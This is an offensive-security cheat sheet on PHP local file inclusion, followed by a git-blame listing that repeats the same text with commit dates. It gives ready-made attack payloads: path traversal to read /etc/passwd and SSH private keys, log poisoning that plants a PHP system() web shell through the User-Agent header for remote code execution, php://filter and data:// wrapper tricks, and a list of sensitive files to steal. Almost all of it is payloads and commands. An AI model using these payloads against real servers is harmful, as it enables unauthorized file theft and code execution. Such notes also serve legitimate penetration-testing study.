killchain-compendium/exploit/web/local_file_inclusion.md

# Local File Inclusion
To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.

* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
## PHP Functions
* Functions provoking an LFI
```php
include()
require()
include_once ()
require_once()
```

## Usage

* Exploit URL parameter by including other files.
```
http://example.com/home?page=about.html
http://example.com/home?page=/etc/passwd
```
    * changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
    ```
    http://example.com/home?page=../../../../etc/passwd
    ```
    or
    ```
    http://example.com/home?page=html/../../../home/<username>/.ssh/id_rsa
    ```

### Log Poisoning
* Inject malicious code into logfiles before using path traversal to open the logfile and trigger the rce.
* `www-data` needs read & write permisson in order to do so.
* Include php code into the `User-Agent` header of the HTTP request. For example a GET parameter to deliver system commandsas follows
```sh
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
```

* Follow up with a request to

```HTTP
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
```

### /proc/self/fd
* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
*  Log poisoning and opening logfile via `/proc/self/fd/xx`.

## Files of Interest
* `/etc/issue`
* `/etc/profile`
* `/proc/version`
* `/etc/passwd`
* `/etc/apache2/.htpasswd`
* `/etc/shadow`
* `/etc/group`
* `/etc/motd`
* `/etc/mysql/my.cnf`
* `/root/.bash_history`
* `/var/log/dmessage`
* `/var/mail/root`
* `/root/.ssh/id_rsa`
* `/var/log/apache2/access.log`
* `C:\boot.ini`
* `/proc/self/fd/xx`
* `/proc/version`
* `/proc/cmdline`
* `/proc/[0-9]*/fd/[0-9]*`

* `sess_<cookieValue>` if the location of the session file is known. Some paths are
```sh
c:\Windows\Temp
/tmp/
/var/lib/php5
/var/lib/php/session
```

### Base64 Encoding via PHP
* Circumvent filter via encoding local files included ins a GET parameter value
* __Read PHP files through encoding them, so they won't be executed__
```http
curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd
```
* Use encoded data as input through the parameter
```sh
curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo=
```

## Tricks

* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
* Terminate query with `/.`
* `..//..//..//file`, double slashes
* URL encode path
second commit 2021-08-23 01:13:54 +02:00			`# Local File Inclusion`
news 2021-09-01 00:44:36 +02:00			To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.
second commit 2021-08-23 01:13:54 +02:00
bump 2021-09-11 02:55:17 +02:00			`* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)`
some more docker 2021-12-09 01:50:04 +01:00			`## PHP Functions`
			`* Functions provoking an LFI`
			```php
			`include()`
			`require()`
			`include_once ()`
			`require_once()`
			```
bump 2021-09-11 02:55:17 +02:00
second commit 2021-08-23 01:13:54 +02:00			`## Usage`

news 2021-09-01 00:44:36 +02:00			`* Exploit URL parameter by including other files.`
second commit 2021-08-23 01:13:54 +02:00			```
			`http://example.com/home?page=about.html`
news 2021-09-01 00:44:36 +02:00			`http://example.com/home?page=/etc/passwd`
second commit 2021-08-23 01:13:54 +02:00			```
			`* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)`
			```
			`http://example.com/home?page=../../../../etc/passwd`
			```
			`or`
			```
news 2021-09-01 00:44:36 +02:00			`http://example.com/home?page=html/../../../home/<username>/.ssh/id_rsa`
second commit 2021-08-23 01:13:54 +02:00			```

news 2021-09-01 00:44:36 +02:00			`### Log Poisoning`
			`* Inject malicious code into logfiles before using path traversal to open the logfile and trigger the rce.`
			* `www-data` needs read & write permisson in order to do so.
			* Include php code into the `User-Agent` header of the HTTP request. For example a GET parameter to deliver system commandsas follows
			```sh
			`curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'`
			```
notes on reversing 2021-11-24 23:52:42 +01:00
			`* Follow up with a request to`

			```HTTP
			`curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'`
			```

			`### /proc/self/fd`
			`* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)`
			* Log poisoning and opening logfile via `/proc/self/fd/xx`.

bump 2021-10-13 01:17:44 +02:00			`## Files of Interest`
			* `/etc/issue`
			* `/etc/profile`
			* `/proc/version`
			* `/etc/passwd`
bump 2022-01-21 21:54:15 +01:00			* `/etc/apache2/.htpasswd`
bump 2021-10-13 01:17:44 +02:00			* `/etc/shadow`
some more docker 2021-12-09 01:50:04 +01:00			* `/etc/group`
			* `/etc/motd`
			* `/etc/mysql/my.cnf`
bump 2021-10-13 01:17:44 +02:00			* `/root/.bash_history`
			* `/var/log/dmessage`
			* `/var/mail/root`
			* `/root/.ssh/id_rsa`
			* `/var/log/apache2/access.log`
			* `C:\boot.ini`
notes on reversing 2021-11-24 23:52:42 +01:00			* `/proc/self/fd/xx`
some more docker 2021-12-09 01:50:04 +01:00			* `/proc/version`
			* `/proc/cmdline`
			* `/proc/[0-9]/fd/[0-9]`

			* `sess_<cookieValue>` if the location of the session file is known. Some paths are
			```sh
			`c:\Windows\Temp`
			`/tmp/`
			`/var/lib/php5`
			`/var/lib/php/session`
			```

			`### Base64 Encoding via PHP`
			`* Circumvent filter via encoding local files included ins a GET parameter value`
			`* __Read PHP files through encoding them, so they won't be executed__`
			```http
			`curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php`
			`curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd`
			```
			`* Use encoded data as input through the parameter`
			```sh
			`curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo=`
			```
bump 2021-10-13 01:17:44 +02:00
			`## Tricks`

			* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
			* Terminate query with `/.`
			* `..//..//..//file`, double slashes
some more docker 2021-12-09 01:50:04 +01:00			`* URL encode path`